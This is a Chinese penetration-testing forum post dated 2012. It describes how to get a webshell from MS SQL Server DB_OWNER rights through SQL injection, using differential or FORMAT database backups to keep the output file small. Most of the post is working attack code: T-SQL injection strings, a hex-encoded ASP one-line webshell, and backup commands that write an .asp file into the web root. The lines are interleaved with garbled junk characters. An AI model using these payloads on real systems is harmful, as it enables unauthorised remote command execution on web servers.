中国网络渗透测试联盟

标题: DB_OWNER权限得到webshell的改进办法 [打印本页]

作者: admin    时间: 2012-11-9 21:31
标题: DB_OWNER权限得到webshell的改进办法
DB_OWNER权限得到webshell的两点改进:( D# s  V0 ~; Z* U% p

( u$ X6 p6 N& ]! T4 m: z8 ?减少备份文件大小,得到可执行的webshell成功率提高不少
# B  x6 _# }% C, E% X8 H( |; y! Y; n* z一利用差异备份- q& W$ D6 K, r. I, H
加一个参数WITH DIFFERENTIAL# Q0 p% a: r$ B6 S' r4 D7 K2 K. ~0 o

. D  u; w) r2 Z9 N% C* F1
8 i9 E0 u2 V, O2; u: x* V1 X3 x- R  }
3) t7 x- d' x) x
4" Y0 D  D5 A7 h4 {; D9 N1 X$ R; Z
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
0 w0 Q- Z7 J- I  ?; zcreate table [dbo].[xiaolu] ([cmd] [image]);# A# }2 w. T+ B2 s1 E" _
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)4 x5 r% N" v& ?# [
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
3 c; \( I& u' x
3 \! Y5 Q7 I: h二利用完全FORMAT
! v# ^* X# U4 [$ a; T* b3 p加一个参数WITH FROMAT
: A5 U( S1 ~7 @! Z$ p有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以: {% t/ b: n) o* |
1 q7 j7 i- a# \) Y% N6 W
1
" t' _3 l! F% D8 F& n24 O( z9 h2 h1 w# m# E# i
3
+ K# U! x$ {+ Z( j: i: D1 x6 L7 S4$ X4 d' n& A* {; J9 L
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s* l  O2 i, W0 B0 Q
create table [dbo].[xiaolu] ([cmd] [image]);, n7 W7 j5 ^2 `. j! l! Q
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
. K. E( z/ h. l8 b  e- R5 udeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
/ N2 N- {3 c# {2 V
9 Y/ I( r$ N! K总的来说就是那么简单几句,下面以备份数据库model为例子
, [, G7 A1 S8 t! F3 Y9 a# f1( I- Q/ @) s. b8 k& r

- l6 v) Q1 t$ D$ l9 u1
$ M# C% h1 a4 w& x id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
+ Z) q( V' A1 k! g
, c* S7 ]: z6 J8 R( Y8 j2
2 x# R* Q6 H2 N0 B. u' Z6 {: p8 r9 c# [) ?9 y* X4 j
1; R+ C5 G) t6 t2 C
id=1;backup database model to disk='你的路径‘ with differential,format;-- 4 k/ h: Z: P+ T% @7 ?. L( o4 E





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2